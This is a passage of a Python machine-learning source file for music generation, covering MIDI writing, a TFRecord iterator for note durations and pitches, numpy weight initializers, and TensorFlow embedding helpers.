79\n sequence.total_time = float(max([end_times[i][-1] for i in range(sn)]))\n\n assert len(delta_times[0]) == len(voices[0])\n for n in range(len(delta_times[0])):\n for i in range(len(voices)):\n # Hardcode 1 sample for now\n v = voices[i][n]\n s = start_times[i][n]\n e = end_times[i][n]\n if v != 0.:\n # Skip silence voices... 
for now\n # namedtuple?\n if n >= prime_until:\n midi_notes.append((default_instrument, default_program, v, s, e))\n else:\n midi_notes.append((priming_instrument, priming_program, v, s, e))\n for tup in midi_notes:\n sequence_note = sequence.notes.add()\n i = tup[0]\n p = tup[1]\n v = tup[2]\n s = tup[3]\n e = tup[4]\n sequence_note.instrument = int(i)\n sequence_note.program = int(p)\n sequence_note.pitch = int(v)\n sequence_note.velocity = int(127.)\n sequence_note.start_time = float(s)\n sequence_note.end_time = float(e)\n\n pretty_midi_object = mm.sequence_proto_to_pretty_midi(sequence)\n pretty_midi_object.write(filename)\n\n\nclass TFRecordDurationAndPitchIterator(object):\n\n def __init__(self, files_path, minibatch_size, start_index=0,\n stop_index=np.inf, make_mask=False,\n sequence_length=None,\n randomize=True):\n \"\"\"Supports regular int, negative indexing, or float for stop_index.\"\"\"\n reader = mm.note_sequence_io.note_sequence_record_iterator(files_path)\n all_ds = []\n all_ps = []\n self.note_classes = list(np.arange(88 + 1)) # + 1 for silence\n # set automatically\n # self.simultaneous_notes = int(max(np.sum(self._data, axis=0)))\n self.simultaneous_notes = 4\n time_classes_set = set(TIME_CLASSES)\n for ns in reader:\n notes = ns.notes\n st = np.array([n.start_time for n in notes]).astype('float32')\n et = np.array([n.end_time for n in notes]).astype('float32')\n pi = np.array([n.pitch for n in notes]).astype('float32')\n\n sample_times = sorted(list(set(st)))\n # go straight for pitch and delta time encoding\n sn = self.simultaneous_notes\n pitch_slices = [pi[st == sti][::-1] for sti in sample_times]\n # This monster fills in 0s so that array size is consistent\n pitch_slices = [p[:sn] if len(p) >= sn\n else\n np.concatenate((p, np.array([0.] 
* (sn - len(p)),\n dtype='float32')))\n for p in pitch_slices]\n start_slices = [st[st == sti] for sti in sample_times]\n end_slices = [et[st == sti] for sti in sample_times]\n start_slices = [ss[:sn] if len(ss) >= sn\n else\n np.concatenate((ss, np.array([ss[0]] * (sn - len(ss)),\n dtype='float32')))\n for ss in start_slices]\n end_slices = [es[:sn] if len(es) >= sn\n else\n np.concatenate((es, np.array([max(es)] * (sn - len(es)),\n dtype='float32')))\n for es in end_slices]\n start_slices = np.array(start_slices)\n end_slices = np.array(end_slices)\n delta_slices = end_slices - start_slices\n unsupported_time_classes = set(delta_slices.ravel()) - time_classes_set\n if unsupported_time_classes:\n tf.logging.warning(\n 'NoteSequence %s:%s has unsupported time classes %s and will be '\n 'skipped',\n ns.id, ns.filename, unsupported_time_classes)\n continue\n all_ds.append(np.array(delta_slices))\n all_ps.append(np.array(pitch_slices))\n assert len(all_ds) == len(all_ps)\n all_ds = np.concatenate(all_ds)\n all_ps = np.concatenate(all_ps)\n\n self._min_time_data = np.min(all_ds)\n self._max_time_data = np.max(all_ds)\n\n truncate = len(all_ds) - len(all_ds) % minibatch_size\n all_ds = all_ds[:truncate]\n all_ps = all_ps[:truncate]\n\n # transpose necessary to preserve data structure!\n # cut the audio into long contiguous subsequences based on the minibatch\n # size.\n all_ds = all_ds.transpose(1, 0)\n all_ds = all_ds.reshape(-1, minibatch_size,\n all_ds.shape[1] // minibatch_size)\n all_ds = all_ds.transpose(2, 1, 0)\n all_ps = all_ps.transpose(1, 0)\n all_ps = all_ps.reshape(-1, minibatch_size,\n all_ps.shape[1] // minibatch_size)\n all_ps = all_ps.transpose(2, 1, 0)\n\n len_ = len(all_ds)\n self._time_data = all_ds\n self._pitch_data = all_ps\n\n self.minibatch_size = minibatch_size\n self.sequence_length = sequence_length\n if randomize:\n self.random_state = np.random.RandomState(2177)\n self.make_mask = make_mask\n\n if stop_index >= 1:\n self.stop_index = int(min(stop_index, len_))\n elif stop_index > 0:\n # percentage\n self.stop_index = int(stop_index * len_)\n elif stop_index < 0:\n # negative index - must be int!\n self.stop_index = len_ + int(stop_index)\n\n self.start_index = start_index\n if start_index < 0:\n # negative indexing\n self.start_index = len_ + start_index\n elif start_index < 1:\n # float\n self.start_index = int(start_index * len_)\n else:\n # regular\n self.start_index = int(start_index)\n if self.start_index >= self.stop_index:\n ss = 'Invalid indexes - stop '\n ss += '%s <= start %s !' 
% (self.stop_index, self.start_index)\n raise ValueError(ss)\n self._current_index = self.start_index\n\n def __iter__(self):\n return self\n\n def next(self):\n return self.__next__()\n\n def __next__(self):\n s = self._current_index\n e = s + self.sequence_length\n if e > self.stop_index:\n raise StopIteration('End of file iterator reached!')\n time_data = np.array(self._time_data[s:e])\n\n # Translate durations from TIME_CLASSES values to TIME_CLASSES indexes.\n # First, find the data to change, then change it.\n # If we don't do this as separate steps, we'll end up changing some data\n # more than once.\n time_class_indexes = []\n for time in TIME_CLASSES:\n time_class_indexes.append(time_data == time)\n for i in range(len(TIME_CLASSES)):\n time_data[time_class_indexes[i]] = i\n\n pitch_data = np.array(self._pitch_data[s:e])\n\n if self.make_mask is False:\n res = (time_data, pitch_data)\n else:\n raise ValueError('Unhandled mask making')\n self._current_index = e\n return res\n\n def reset(self):\n self._current_index = self.start_index\n\n##\n# end datasets\n##\n\n##\n# begin initializers and Theano functions\n##\n\n\ndef np_zeros(shp):\n \"\"\"Builds a numpy variable filled with zeros.\n\n Args:\n shp: tuple of ints\n shape of zeros to initialize\n\n Returns:\n initialized_zeros, array-like\n Array-like of zeros the same size as shape parameter\n \"\"\"\n return np.zeros(shp).astype('float32')\n\n\ndef np_normal(shp, random_state, scale=0.01):\n \"\"\"Builds a numpy variable filled with normal random values.\n\n Args:\n shp: tuple of ints or tuple of tuples\n shape of values to initialize\n tuple of ints should be single shape\n tuple of tuples is primarily for convnets and should be of form\n ((n_in_kernels, kernel_width, kernel_height),\n (n_out_kernels, kernel_width, kernel_height))\n random_state: numpy.random.RandomState() object\n scale: float (default 0.01)\n default of 0.01 results in normal random values with variance 0.01\n\n Returns:\n initialized_normal, array-like\n Array-like of normal random values the same size as shape parameter\n \"\"\"\n if isinstance(shp[0], tuple):\n shp = (shp[1][0], shp[0][0]) + shp[1][1:]\n return (scale * random_state.randn(*shp)).astype('float32')\n\n\ndef np_tanh_fan_normal(shp, random_state, scale=1.):\n \"\"\"Builds a numpy variable filled with random values.\n\n Args:\n shp: tuple of ints or tuple of tuples\n shape of values to initialize\n tuple of ints should be single shape\n tuple of tuples is primarily for convnets and should be of form\n ((n_in_kernels, kernel_width, kernel_height),\n (n_out_kernels, kernel_width, kernel_height))\n random_state: numpy.random.RandomState() object\n scale: float (default 1.)\n default of 1. results in normal random values\n with sqrt(2 / (fan in + fan out)) scale\n\n Returns:\n initialized_fan, array-like\n Array-like of random values the same size as shape parameter\n\n References\n ----------\n Understanding the difficulty of training deep feedforward neural networks\n X. Glorot, Y. Bengio\n \"\"\"\n # The . after the 2 is critical! shape has dtype int...\n if isinstance(shp[0], tuple):\n kern_sum = np.prod(shp[0]) + np.prod(shp[1])\n shp = (shp[1][0], shp[0][0]) + shp[1][1:]\n else:\n kern_sum = np.sum(shp)\n var = scale * np.sqrt(2. 
/ kern_sum)\n return var * random_state.randn(*shp).astype('float32')\n\n\ndef np_variance_scaled_uniform(shp, random_state, scale=1.):\n \"\"\"Builds a numpy variable filled with random values.\n\n Args:\n shp: tuple of ints or tuple of tuples\n shape of values to initialize\n tuple of ints should be single shape\n tuple of tuples is primarily for convnets and should be of form\n ((n_in_kernels, kernel_width, kernel_height),\n (n_out_kernels, kernel_width, kernel_height))\n random_state: numpy.random.RandomState() object\n scale: float (default 1.)\n default of 1. results in uniform random values\n with 1 * sqrt(1 / (n_dims)) scale\n\n Returns:\n initialized_scaled, array-like\n Array-like of random values the same size as shape parameter\n\n References\n ----------\n Efficient Backprop\n Y. LeCun, L. Bottou, G. Orr, K. Muller\n \"\"\"\n if isinstance(shp[0], tuple):\n shp = (shp[1][0], shp[0][0]) + shp[1][1:]\n kern_sum = np.prod(shp[0])\n else:\n kern_sum = shp[0]\n # Make sure bounds aren't the same\n bound = scale * np.sqrt(3. / kern_sum) # sqrt(3) for std of uniform\n return random_state.uniform(low=-bound, high=bound, size=shp).astype(\n 'float32')\n\n\ndef np_ortho(shp, random_state, scale=1.):\n \"\"\"Builds a numpy variable filled with orthonormal random values.\n\n Args:\n shp: tuple of ints or tuple of tuples\n shape of values to initialize\n tuple of ints should be single shape\n tuple of tuples is primarily for convnets and should be of form\n ((n_in_kernels, kernel_width, kernel_height),\n (n_out_kernels, kernel_width, kernel_height))\n random_state: numpy.random.RandomState() object\n scale: float (default 1.)\n default of 1. results in orthonormal random values sacled by 1.\n\n Returns:\n initialized_ortho, array-like\n Array-like of random values the same size as shape parameter\n\n References\n ----------\n Exact solutions to the nonlinear dynamics of learning in deep linear\n neural networks\n A. Saxe, J. McClelland, S. 
Ganguli\n  \"\"\"\n  if isinstance(shp[0], tuple):\n    shp = (shp[1][0], shp[0][0]) + shp[1][1:]\n    flat_shp = (shp[0], np.prod(shp[1:]))\n  else:\n    flat_shp = shp\n  g = random_state.randn(*flat_shp)\n  u, _, vt = linalg.svd(g, full_matrices=False)\n  res = u if u.shape == flat_shp else vt  # pick one with the correct shape\n  res = res.reshape(shp)\n  return (scale * res).astype('float32')\n\n\ndef make_numpy_biases(bias_dims):\n  return [np_zeros((dim,)) for dim in bias_dims]\n\n\ndef make_numpy_weights(in_dim, out_dims, random_state, init=None,\n                       scale='default'):\n  \"\"\"\n  Will return as many things as are in the list of out_dims\n  You *must* get a list back, even for 1 element returned:\n  blah, = make_weights(...)\n  or\n  [blah] = make_weights(...)\n  \"\"\"\n  ff = [None] * len(out_dims)\n  for i, out_dim in enumerate(out_dims):\n    if init is None:\n      if in_dim == out_dim:\n        ff[i] = np_ortho\n      else:\n        ff[i] = np_variance_scaled_uniform\n    else:\n      raise ValueError('Unknown init type %s' % init)\n  if scale == 'default':\n    ws = [ff[i]((in_dim, out_dim), random_state)\n          for i, out_dim in enumerate(out_dims)]\n  else:\n    ws = [ff[i]((in_dim, out_dim), random_state, scale=scale)\n          for i, out_dim in enumerate(out_dims)]\n  return ws\n\n\n# Storage of internal shared\n_lib_shared_params = OrderedDict()\n\n\ndef _get_name():\n  return str(uuid.uuid4())\n\n\ndef _get_shared(name):\n  if name in _lib_shared_params.keys():\n    tf.logging.info('Found name %s in shared parameters' % name)\n    return _lib_shared_params[name]\n  else:\n    raise NameError('Name not found in shared params!')\n\n\ndef _set_shared(name, variable):\n  if name in _lib_shared_params.keys():\n    raise ValueError('Trying to set key %s which already exists!' % name)\n  _lib_shared_params[name] = variable\n\n\ndef embedding(indices, n_symbols, output_dim, random_state, name=None):\n  \"\"\"Last dimension of indices tensor must be 1!!!!\"\"\"\n  if name is None:\n    name = _get_name()\n\n  try:\n    vectors = _get_shared(name)\n  except NameError:\n    vectors = tf.Variable(\n        random_state.randn(n_symbols, output_dim).astype('float32'),\n        trainable=True)\n    _set_shared(name, vectors)\n\n  ii = tf.cast(indices, 'int32')\n  shp = shape(ii)\n  nd = len(shp)\n  lu = tf.nn.embedding_lookup(vectors, ii)\n  if nd == 3:\n    lu = lu[:, :, 0, :]\n  else:\n    return lu\n  return lu\n\n\ndef multiembedding(multi_indices, n_symbols, output_dim, random_state,\n                   name=None, share_all=False):\n  \"\"\"Helper to compute many embeddings and concatenate.\n\n  Requires input indices to be 3D, with last axis being the \"iteration\"\n  dimension\n  \"\"\"\n  # Should n_symbols be a list of embedding values?\n  output_embeds = []\n  shp = shape(multi_indices)\n  if len(shp) != 3:\n    raise ValueError('Unhandled rank != 3 for input multi_indices')\n  index_range = shp[-1]\n  if share_all:\n    if name is None:\n      n = _get_name()\n      names = [n] * index_range\n    else:\n      names = [name + '_0' for i in range(index_range)]\n  else:\n    if name is None:\n      names = [_get_name() for i in range(index_range)]\n    else:\n      names = [name + '_%i' % i for i in range(index_range)]\n  for i in range(index_range):\n    e = embedding(multi_indices[:, :, i], n_symbols, output_dim, random_state,\n                  name=names[i])\n    output_embeds.append(e)\n  return tf.concat(2, output_embeds)\n\n\ndef automask(input_tensor, n_masks, axis=-1):\n  \"\"\"Auto masker to make multiple MADE/pixelRNN style masking easier.\n\n  n_masks *must* be an even divisor of input_tensor.shape[axis]\n\n  masks are basically of form\n\n  [:, :, :i * divisor_dim] = 1.\n  for i in range(n_masks)\n\n  a 1, 
4 example with n_masks = 2 would be\n\n mask0 = [0., 0., 0., 0.]\n mask1 = [1., 1., 0., 0.]\n\n The goal of these masks is to model p(y_i,t | x_<=t, y_